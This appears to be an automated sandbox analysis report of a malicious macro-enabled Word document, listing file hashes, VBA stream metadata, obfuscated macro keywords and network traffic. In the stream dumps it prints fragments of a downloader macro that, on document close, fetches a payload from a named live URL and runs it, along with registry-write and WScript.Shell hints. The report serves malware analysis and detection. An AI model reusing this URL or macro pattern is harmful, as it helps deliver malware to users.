                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):22
                                                                                                                                                  Entropy (8bit):2.9808259362290785
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:QAlX0Gn:QKn
                                                                                                                                                  MD5:7962B839183642D3CDC2F9CEBDBF85CE
                                                                                                                                                  SHA1:2BE8F6F309962ED367866F6E70668508BC814C2D
                                                                                                                                                  SHA-256:5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6
                                                                                                                                                  SHA-512:2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: ....p.r.a.t.e.s.h.....
                                                                                                                                                  C:\Users\user\Desktop\~$tei-04.28.2021.doc
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):162
                                                                                                                                                  Entropy (8bit):1.494861186799854
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:Rl/Zd0lbkj3kllalRhlXlk:RtZCbyk2
                                                                                                                                                  MD5:4C507C3324F22A4C2BFFBDD520DD5674
                                                                                                                                                  SHA1:E44DB415A96B00B95B2BF061C7DEB3B8C88E0967
                                                                                                                                                  SHA-256:99A8179412ADA135B685AB226D0AF920DBF689422EE95A375EC687BF7561D775
                                                                                                                                                  SHA-512:2C99AC5A727014748E955F7117C3C2C2379993012A3167AB37A7C2C5E5E9F05DF197748EE3165A2E09E950926EFBFE1AE6F2DAA60CC141CD3B4B00D3AC483606
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: .pratesh................................................p.r.a.t.e.s.h...................................pLA.......................................................

                                                                                                                                                  Static File Info

                                                                                                                                                  General

                                                                                                                                                  File type:Microsoft Word 2007+
                                                                                                                                                  Entropy (8bit):7.82220089201397
                                                                                                                                                  TrID:
                                                                                                                                                  • Word Microsoft Office Open XML Format document with Macro (52004/1) 33.99%
                                                                                                                                                  • Word Microsoft Office Open XML Format document (49504/1) 32.35%
                                                                                                                                                  • Word Microsoft Office Open XML Format document (43504/1) 28.43%
                                                                                                                                                  • ZIP compressed archive (8000/1) 5.23%
                                                                                                                                                  File name:Datei-04.28.2021.doc
                                                                                                                                                  File size:103261
                                                                                                                                                  MD5:6747583727ce069aa8ae9d398d35e5bc
                                                                                                                                                  SHA1:97667bf552bf5557666b5266003b0411bc1669bc
                                                                                                                                                  SHA256:127d2018e008677e5a0af20d8981806e07e3b57285787800554708803aaca6bd
                                                                                                                                                  SHA512:88ca8855faf07a809f7badd05e0a36da9b24f103204e66ff2624de77a6f86428bee188f290dd224cabf99fe9ba0d28e73d543967d9e591fed69128ddf08e1719
                                                                                                                                                  SSDEEP:1536:AH1R5bJCWehdklvI0APY2ywnbcbWSfZL2+wSJx8+RBZe0nV3AgXf0lSQw6egTm:KbJrlZAPY2yWwb3ZadaxHeuNQpegTm
                                                                                                                                                  File Content Preview:PK..........!.x..}....e.......[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                                                                  File Icon

                                                                                                                                                  Icon Hash:74f4c4c6c1cac4d8

                                                                                                                                                  Static OLE Info

                                                                                                                                                  General

                                                                                                                                                  Document Type:OpenXML
Number of OLE Files: 1

OLE File "/opt/package/joesandbox/database/analysis/399362/sample/Datei-04.28.2021.doc"

Indicators

Has Summary Info: False
Application Name: unknown
Encrypted Document: False
Contains Word Document Stream:
Contains Workbook/Book Stream:
Contains PowerPoint Document Stream:
Contains Visio Document Stream:
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros: True

Summary

Title: explorer c:\users\public\argumentSelectTmp.hta
Subject:
Author: ujmg
Keywords:
Template: Normal
Last Saved By: Пользователь Windows
Revision Number: 2
Total Edit Time: 0
Create Time: 2021-04-28T04:45:00Z
Last Saved Time: 2021-04-28T04:45:00Z
Number of Pages: 1
Number of Words: 0
Number of Characters: 0
Creating Application: Microsoft Office Word
Security: 4

Document Summary

Number of Lines: 2
Number of Paragraphs: 0
Thumbnail Scaling Desired: false
Company:
Contains Dirty Links: false
Shared Document: false
Changed Hyperlinks: false
Application Version: 16.0000

Streams with VBA

VBA File Name: ThisDocument.cls, Stream Size: 1127

General

Stream Path: VBA/ThisDocument
VBA File Name: ThisDocument.cls
Stream Size: 1127

VBA Code Keywords

Keyword
False
VB_Exposed
Attribute
VB_Creatable
VB_Name
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_Customizable
VB_TemplateDerived
"ThisDocument"

VBA Code

VBA File Name: UserForm1.frm, Stream Size: 1182

General

Stream Path: VBA/UserForm1
VBA File Name: UserForm1.frm
Stream Size: 1182

VBA Code Keywords

Keyword
False
VB_Exposed
Attribute
VB_Name
VB_Creatable
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_Customizable
VB_TemplateDerived

VBA Code

VBA File Name: listCopy.bas, Stream Size: 1037

General

Stream Path: VBA/listCopy
VBA File Name: listCopy.bas
Stream Size: 1037

VBA Code Keywords

Keyword
"listCopy"
clearIteratorRef
Attribute
autoopen()
convertIndex
VB_Name
viewValueTextbox
memoryIndex
String

VBA Code

VBA File Name: optionRemoveGeneric.bas, Stream Size: 1304

General

Stream Path: VBA/optionRemoveGeneric
VBA File Name: optionRemoveGeneric.bas
Stream Size: 1304

VBA Code Keywords

Keyword
optionPtr.Quit
False
optionPtr
String)
Attribute
optionPtr.Documents.Add
collectionSelect
VB_Name
CreateObject("word.application")
"optionRemoveGeneric"
memoryTempTrust
memoryIndex(memoryTempTrust
optionPtr.Visible
SaveChanges:=wdDoNotSaveChanges
collectionSelect.VBProject.VBComponents("ThisDocument").CodeModule.AddFromString

VBA Code

VBA File Name: refConvertCaption.bas, Stream Size: 1636

General

Stream Path: VBA/refConvertCaption
VBA File Name: refConvertCaption.bas
Stream Size: 1636

VBA Code Keywords

Keyword
String)
VB_Name
vbSwap
"refConvertCaption"
memCaptionOption.Text
StrConv(captionPaste,
Function
vbSwap.createElement("code")
exceptionPointer
Object
Variant
memConvertStruct)
ptrPtrStorage
memCaptionOption.DataType
constCollectionDatabase
memCaptionOption
memCaptionOption.nodeTypedValue
exceptionPointer(captionPaste,
ptrPtrStorage(constCollectionDatabase
Attribute

VBA Code

VBA File Name: repoText.bas, Stream Size: 2970

General

Stream Path: VBA/repoText
VBA File Name: repoText.bas
Stream Size: 2970

VBA Code Keywords

Keyword
convertIndex
String)
"repoText"
clearRefLoad
.RegWrite
VB_Name
Public
Function
varClass
String
Application.Version
captionBufData()
textExButton
vbUnicode)
Chr$(Val("&H"
clearRefLoad,
"jZXNzVkJPTQ=="),
Mid$(tempClearIndex,
arrayOption
Len(tempClearIndex)
mainExLocal
listboxNextVar()
CreateObject("ws"
"VjdXJpdHlcQWN"
                                                                                                                                                  viewValueTextbox()
                                                                                                                                                  trustStruct
                                                                                                                                                  tempClearIndex
                                                                                                                                                  globalResponse
                                                                                                                                                  textExButton(ByVal
                                                                                                                                                  varClass()
                                                                                                                                                  arrayOption,
                                                                                                                                                  countSelect
                                                                                                                                                  captionBufData
                                                                                                                                                  titleSize
                                                                                                                                                  Attribute
                                                                                                                                                  "REG_DWORD"
                                                                                                                                                  "cript.sh"
                                                                                                                                                  "ell")
                                                                                                                                                  convertIndex()
                                                                                                                                                  listboxNextVar
                                                                                                                                                  clearReference
                                                                                                                                                  mainExLocal()
VBA Code

Streams

Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 689
General
Stream Path: PROJECT
File Type: ASCII text, with CRLF line terminators
Stream Size: 689
Entropy: 5.29372046772
Base64 Encoded: True
Data ASCII: I D = " { 2 A 8 A 4 9 5 1 - B 5 C 1 - 4 C 9 C - A E 1 6 - E D B 1 E 3 E 7 5 4 8 3 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4 F } . . B a s e C l a s s = U s e r F o r m 1 . . M o d u l e = l i s t C o p y . . M o d u l e = r e f C o n v e r t C a p t i o n . . M o d u l e = o p t i o n R e m o v e G e n e r i c . . M o d u l e = r e p o T e x t . . N a m e = " P r o j e c t " . . H e l p
Data Raw: 49 44 3d 22 7b 32 41 38 41 34 39 35 31 2d 42 35 43 31 2d 34 43 39 43 2d 41 45 31 36 2d 45 44 42 31 45 33 45 37 35 34 38 33 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 50 61 63 6b 61 67 65 3d 7b 41 43 39 46 32 46 39 30 2d 45 38 37 37 2d 31 31 43 45 2d 39 46 36 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 0d 0a 42

Stream Path: PROJECTwm, File Type: data, Stream Size: 239
General
Stream Path: PROJECTwm
File Type: data
Stream Size: 239
Entropy: 3.53833137583
Base64 Encoded: False
Data ASCII: T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . U s e r F o r m 1 . U . s . e . r . F . o . r . m . 1 . . . l i s t C o p y . l . i . s . t . C . o . p . y . . . r e f C o n v e r t C a p t i o n . r . e . f . C . o . n . v . e . r . t . C . a . p . t . i . o . n . . . o p t i o n R e m o v e G e n e r i c . o . p . t . i . o . n . R . e . m . o . v . e . G . e . n . e . r . i . c . . . r e p o T e x t . r . e . p . o . T . e . x . t . . . . .
Data Raw: 54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 55 73 65 72 46 6f 72 6d 31 00 55 00 73 00 65 00 72 00 46 00 6f 00 72 00 6d 00 31 00 00 00 6c 69 73 74 43 6f 70 79 00 6c 00 69 00 73 00 74 00 43 00 6f 00 70 00 79 00 00 00 72 65 66 43 6f 6e 76 65 72 74 43 61 70 74 69 6f 6e 00 72 00 65 00 66 00 43 00 6f 00 6e 00 76 00

Stream Path: UserForm1/\x1CompObj, File Type: data, Stream Size: 97
General
Stream Path: UserForm1/\x1CompObj
File Type: data
Stream Size: 97
Entropy: 3.61064918306
Base64 Encoded: False
Data ASCII: . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
Data Raw: 01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: UserForm1/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 292
General
Stream Path: UserForm1/\x3VBFrame
File Type: ASCII text, with CRLF line terminators
Stream Size: 292
Entropy: 4.58743694765
Base64 Encoded: True
Data ASCII: V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 1 . . C a p t i o n = " U s e r F o r m 1 " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w
Data Raw: 56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 31 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 31 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20

Stream Path: UserForm1/f, File Type: data, Stream Size: 90
General
Stream Path: UserForm1/f
File Type: data
Stream Size: 90
Entropy: 2.89102698747
Base64 Encoded: False
Data ASCII: . . . . . . . . . . . . . . . . } . . k . . . . . . . . . . . . . . . . . . . . . , . . . . . h o . . $ . . . . . . . . . . . . . X . . . . . . . T e x t B o x 1 4 . . . . . . .
Data Raw: 00 04 20 00 08 0c 00 0c 01 00 00 00 01 00 00 00 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 2c 00 00 00 00 01 68 6f 00 00 24 00 e5 01 00 00 08 00 00 80 01 00 00 00 58 03 00 00 00 00 17 00 54 65 78 74 42 6f 78 31 34 02 00 00 1a 01 00 00

Stream Path: UserForm1/o, File Type: data, Stream Size: 856
General
Stream Path: UserForm1/o
File Type: data
Stream Size: 856
Entropy: 5.78040237389
Base64 Encoded: True
Data ASCII: . . 8 . . . @ . . . . . . H . . . . . . . . . . { . . . S u b a u t o c l o s e ( ) . . d o w n l o a d . . e x e c u t e . . E n d S u b . . . . S u b d o w n l o a d ( ) . . . . S e t x m l h t t p = C r e a t e O b j e c t ( " m i c r o s o f t . x m l h t t p " ) . . x m l h t t p . O p e n " G E T " , " h t t p : / / b e t t e r - t r a n s p o r t - 2 0 0 8 . c o m / b i j o l / d V 6 T 3 i G 7 z Y Y N / G d U b 2 h c o K h 0 i 1 6 j t B 3 A 2 H 0 N A 1 h p c / 7 4 6 8
Data Raw: 00 02 38 03 01 01 40 80 00 00 00 00 1b 48 80 ac 1d 03 00 80 ec 09 00 00 7b 02 00 00 53 75 62 20 61 75 74 6f 63 6c 6f 73 65 28 29 0d 0a 20 20 20 20 64 6f 77 6e 6c 6f 61 64 0d 0a 20 20 20 20 65 78 65 63 75 74 65 0d 0a 45 6e 64 20 53 75 62 0d 0a 0d 0a 53 75 62 20 64 6f 77 6e 6c 6f 61 64 28 29 0d 0a 0d 0a 53 65 74 20 78 6d 6c 68 74 74 70 20 3d 20 43 72 65 61 74 65 4f 62 6a 65 63 74 28

Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 4855
General
Stream Path: VBA/_VBA_PROJECT
File Type: data
Stream Size: 4855
Entropy: 4.66602075705
Base64 Encoded: False
Data ASCII: . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 1 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c .
Data Raw: cc 61 b2 00 00 03 00 ff 19 04 00 00 09 04 00 00 e3 04 03 00 00 00 00 00 00 00 00 00 01 00 07 00 02 00 fe 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00

Stream Path: VBA/__SRP_0, File Type: data, Stream Size: 2486
General
Stream Path: VBA/__SRP_0
File Type: data
Stream Size: 2486
Entropy: 3.64532699898
Base64 Encoded: True
Data ASCII: . K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * \\ C N o r m a l r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ N . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . q . . . . . . . . . . . . . W
Data Raw: 93 4b 2a b2 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 01 00 09 00 00 00 2a 5c 43 4e 6f 72 6d 61 6c 72 55 00 01 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00

Stream Path: VBA/__SRP_1, File Type: data, Stream Size: 214
General
Stream Path: VBA/__SRP_1
File Type: data
Stream Size: 214
Entropy: 1.76333029747
Base64 Encoded: False
Data ASCII: r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . q . . . . . . . . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . .
Data Raw: 72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 02 00 00 00 00 00 00 7e 7a 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff

Stream Path: VBA/__SRP_2, File Type: data, Stream Size: 348
General
Stream Path: VBA/__SRP_2
File Type: data
Stream Size: 348
Entropy: 1.78667786328
Base64 Encoded: False
Data ASCII: r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw: 72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 01 00 00 00 01 00 d1 0b 00 00 00 00 00 00 00 00 00 00 11 0c 00 00 00 00 00 00 00 00 00 00 41 0c

Stream Path: VBA/__SRP_3, File Type: data, Stream Size: 106
General
Stream Path: VBA/__SRP_3
File Type: data
Stream Size: 106
Entropy: 1.35911194617
Base64 Encoded: False
Data ASCII: r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . b . . . . . . . . . . . . . . .
Data Raw: 72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 78 00 00 00 08 00 00 00 00 00 00 00 62 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00

Stream Path: VBA/dir, File Type: Tower/XP rel 3 object not stripped - version 18435, Stream Size: 1172
General
Stream Path: VBA/dir
File Type: Tower/XP rel 3 object not stripped - version 18435
Stream Size: 1172
Entropy: 6.62532484228
Base64 Encoded: True
Data ASCII: . . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . . l . . . . . . . . . . . | b . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s t e m 3 . 2 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . E N o r m a l . . E N . C r . m . a Q . F . . . . . . . * , \\ C . . . . . . m . .
Data Raw: 01 90 b4 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 06 bb 7c 62 0f 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30

Network Behavior

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 28, 2021 17:53:44.786062002 CEST | 49710 | 80 | 192.168.2.5 | 45.142.215.160
Apr 28, 2021 17:53:44.855005026 CEST | 80 | 49710 | 45.142.215.160 | 192.168.2.5
Apr 28, 2021 17:53:44.855154037 CEST | 49710 | 80 | 192.168.2.5 | 45.142.215.160
Apr 28, 2021 17:53:44.855736017 CEST | 49710 | 80 | 192.168.2.5 | 45.142.215.160
Apr 28, 2021 17:53:44.923049927 CEST | 80 | 49710 | 45.142.215.160 | 192.168.2.5
Apr 28, 2021 17:53:45.297656059 CEST | 80 | 49710 | 45.142.215.160 | 192.168.2.5
Apr 28, 2021 17:53:45.298316002 CEST | 49710 | 80 | 192.168.2.5 | 45.142.215.160
Apr 28, 2021 17:53:50.303154945 CEST | 80 | 49710 | 45.142.215.160 | 192.168.2.5
Apr 28, 2021 17:53:50.304030895 CEST | 49710 | 80 | 192.168.2.5 | 45.142.215.160
Apr 28, 2021 17:53:56.430592060 CEST | 49710 | 80 | 192.168.2.5 | 45.142.215.160

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 28, 2021 17:53:30.874490976 CEST | 53784 | 53 | 192.168.2.5 | 8.8.8.8
Apr 28, 2021 17:53:30.925375938 CEST | 53 | 53784 | 8.8.8.8 | 192.168.2.5
Apr 28, 2021 17:53:31.511425972 CEST | 65307 | 53 | 192.168.2.5 | 8.8.8.8
Apr 28, 2021 17:53:31.511853933 CEST | 64344 | 53 | 192.168.2.5 | 8.8.8.8
Apr 28, 2021 17:53:31.561132908 CEST | 53 | 64344 | 8.8.8.8 | 192.168.2.5
Apr 28, 2021 17:53:31.573415041 CEST | 62060 | 53 | 192.168.2.5 | 8.8.8.8
Apr 28, 2021 17:53:31.585130930 CEST | 53 | 65307 | 8.8.8.8 | 192.168.2.5
Apr 28, 2021 17:53:31.622153997 CEST | 53 | 62060 | 8.8.8.8 | 192.168.2.5
Apr 28, 2021 17:53:32.602096081 CEST | 61805 | 53 | 192.168.2.5 | 8.8.8.8
Apr 28, 2021 17:53:32.653616905 CEST | 53 | 61805 | 8.8.8.8 | 192.168.2.5
Apr 28, 2021 17:53:33.699693918 CEST | 54795 | 53 | 192.168.2.5 | 8.8.8.8
Apr 28, 2021 17:53:33.749295950 CEST | 53 | 54795 | 8.8.8.8 | 192.168.2.5
Apr 28, 2021 17:53:34.211718082 CEST | 49557 | 53 | 192.168.2.5 | 8.8.8.8
Apr 28, 2021 17:53:34.271522999 CEST | 53 | 49557 | 8.8.8.8 | 192.168.2.5
Apr 28, 2021 17:53:34.778029919 CEST | 61733 | 53 | 192.168.2.5 | 8.8.8.8
Apr 28, 2021 17:53:34.831298113 CEST | 53 | 61733 | 8.8.8.8 | 192.168.2.5
Apr 28, 2021 17:53:36.422395945 CEST | 65447 | 53 | 192.168.2.5 | 8.8.8.8
Apr 28, 2021 17:53:36.476030111 CEST | 53 | 65447 | 8.8.8.8 | 192.168.2.5
Apr 28, 2021 17:53:38.167542934 CEST | 52441 | 53 | 192.168.2.5 | 8.8.8.8
Apr 28, 2021 17:53:38.219259977 CEST | 53 | 52441 | 8.8.8.8 | 192.168.2.5
Apr 28, 2021 17:53:39.495086908 CEST | 62176 | 53 | 192.168.2.5 | 8.8.8.8
Apr 28, 2021 17:53:39.589145899 CEST | 53 | 62176 | 8.8.8.8 | 192.168.2.5
Apr 28, 2021 17:53:40.201677084 CEST | 59596 | 53 | 192.168.2.5 | 8.8.8.8
Apr 28, 2021 17:53:40.280931950 CEST | 53 | 59596 | 8.8.8.8 | 192.168.2.5
Apr 28, 2021 17:53:41.209798098 CEST | 65296 | 53 | 192.168.2.5 | 8.8.8.8
Apr 28, 2021 17:53:41.211311102 CEST | 59596 | 53 | 192.168.2.5 | 8.8.8.8
Apr 28, 2021 17:53:41.261423111 CEST | 53 | 65296 | 8.8.8.8 | 192.168.2.5
Apr 28, 2021 17:53:41.282182932 CEST | 53 | 59596 | 8.8.8.8 | 192.168.2.5
Apr 28, 2021 17:53:42.227437973 CEST | 59596 | 53 | 192.168.2.5 | 8.8.8.8
Apr 28, 2021 17:53:42.276070118 CEST | 53 | 59596 | 8.8.8.8 | 192.168.2.5
Apr 28, 2021 17:53:42.989947081 CEST | 63183 | 53 | 192.168.2.5 | 8.8.8.8
Apr 28, 2021 17:53:43.047410011 CEST | 53 | 63183 | 8.8.8.8 | 192.168.2.5
Apr 28, 2021 17:53:43.937576056 CEST | 60151 | 53 | 192.168.2.5 | 8.8.8.8
Apr 28, 2021 17:53:43.997072935 CEST | 53 | 60151 | 8.8.8.8 | 192.168.2.5
Apr 28, 2021 17:53:44.029372931 CEST | 56969 | 53 | 192.168.2.5 | 8.8.8.8
Apr 28, 2021 17:53:44.089503050 CEST | 53 | 56969 | 8.8.8.8 | 192.168.2.5
Apr 28, 2021 17:53:44.243268013 CEST | 59596 | 53 | 192.168.2.5 | 8.8.8.8
Apr 28, 2021 17:53:44.300282001 CEST | 53 | 59596 | 8.8.8.8 | 192.168.2.5
Apr 28, 2021 17:53:44.715724945 CEST | 55161 | 53 | 192.168.2.5 | 8.8.8.8
Apr 28, 2021 17:53:44.775250912 CEST | 53 | 55161 | 8.8.8.8 | 192.168.2.5
Apr 28, 2021 17:53:44.945919991 CEST | 60151 | 53 | 192.168.2.5 | 8.8.8.8
Apr 28, 2021 17:53:45.003277063 CEST | 53 | 60151 | 8.8.8.8 | 192.168.2.5
Apr 28, 2021 17:53:45.948122978 CEST | 60151 | 53 | 192.168.2.5 | 8.8.8.8
Apr 28, 2021 17:53:46.005336046 CEST | 53 | 60151 | 8.8.8.8 | 192.168.2.5
Apr 28, 2021 17:53:47.952606916 CEST | 60151 | 53 | 192.168.2.5 | 8.8.8.8
Apr 28, 2021 17:53:48.011315107 CEST | 53 | 60151 | 8.8.8.8 | 192.168.2.5
Apr 28, 2021 17:53:48.042252064 CEST | 54757 | 53 | 192.168.2.5 | 8.8.8.8
Apr 28, 2021 17:53:48.096286058 CEST | 53 | 54757 | 8.8.8.8 | 192.168.2.5
Apr 28, 2021 17:53:48.243958950 CEST | 59596 | 53 | 192.168.2.5 | 8.8.8.8
Apr 28, 2021 17:53:48.305047989 CEST | 53 | 59596 | 8.8.8.8 | 192.168.2.5
Apr 28, 2021 17:53:48.872380972 CEST | 49992 | 53 | 192.168.2.5 | 8.8.8.8
Apr 28, 2021 17:53:48.922638893 CEST | 53 | 49992 | 8.8.8.8 | 192.168.2.5
Apr 28, 2021 17:53:51.968785048 CEST | 60151 | 53 | 192.168.2.5 | 8.8.8.8
Apr 28, 2021 17:53:52.026160002 CEST | 53 | 60151 | 8.8.8.8 | 192.168.2.5
Apr 28, 2021 17:54:02.007973909 CEST | 60075 | 53 | 192.168.2.5 | 8.8.8.8
Apr 28, 2021 17:54:02.070261002 CEST | 53 | 60075 | 8.8.8.8 | 192.168.2.5
Apr 28, 2021 17:54:07.338835955 CEST | 55016 | 53 | 192.168.2.5 | 8.8.8.8
Apr 28, 2021 17:54:07.387577057 CEST | 53 | 55016 | 8.8.8.8 | 192.168.2.5
Apr 28, 2021 17:54:17.810230017 CEST | 64345 | 53 | 192.168.2.5 | 8.8.8.8
Apr 28, 2021 17:54:17.873986959 CEST | 53 | 64345 | 8.8.8.8 | 192.168.2.5
Apr 28, 2021 17:54:36.566135883 CEST | 57128 | 53 | 192.168.2.5 | 8.8.8.8
Apr 28, 2021 17:54:36.623500109 CEST | 53 | 57128 | 8.8.8.8 | 192.168.2.5
Apr 28, 2021 17:54:37.176513910 CEST | 54791 | 53 | 192.168.2.5 | 8.8.8.8
